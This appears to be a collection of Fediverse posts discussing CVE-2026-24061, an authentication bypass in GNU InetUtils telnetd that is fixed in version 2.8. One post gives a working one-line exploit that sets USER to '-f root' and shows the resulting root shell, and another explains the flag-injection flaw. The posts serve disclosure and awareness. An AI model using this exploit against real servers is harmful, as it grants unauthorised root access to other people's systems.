Nearly 800,000 #Telnet servers exposed to remote attacks
The security flaw (CVE-2026-24061) already has a proof-of-concept exploit, impacts GNU InetUtils versions 1.9.3 (released in 2015) through 2.7, and was patched in version 2.8 (released on January 20).
Warning: computer nerd stuff below:
So. In 2026, telnet is still a thing.
Really? 😑
ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address
[usual Ubuntu /etc/issue text]
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
You’re welcome.
🚨 Critical #Telnet Authentication Bypass Vulnerability Discovered #CVE202624061 #cybersecurity #infosec #DevOps #security
🔓 #GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via "-f root" USER environment variable
⚡ The exploit is shockingly simple: attackers send "-f root" as the USER value, triggering /usr/bin/login -f root which skips password authentication entirely
🧵 👇
🎯 Nearly 800,000 #Telnet servers potentially affected worldwide running vulnerable GNU inet utils implementations
📅 Bug existed since 2015 code changes, finally patched January 20, 2026 in version 2.8
🔧 The flaw stems from missing input sanitization: USER environment variable from network is passed unsanitized to login command, allowing flag injection
The orange site shared this link, telnet.org which has a list of servers to which you can connect over Telnet. (Warning: these are always unencrypted connections).
If you want a Telnet-like experience but over a secure #TLS connection (e.g. using an #SSH client), check out the “Tildeverse,” https://tildeverse.org/ , a list of public-access servers with SSH login. It is like the #Fediverse but using TLS rather than the #ActivityPub protocol. The obvious drawback is that you need to know how to use a command line, but I doubt that would bother most Fediverse dwellers.
@screwlisp I didn’t see https://lambda.moo.mud.org at all in this list of Telnet logins. We may need to do something about that.
Joe Ortiz
stux⚡️
lmorchard's links
Monte Freeman
michabbb
Galactic Stone
CyberVeille.ch
Ramin Honary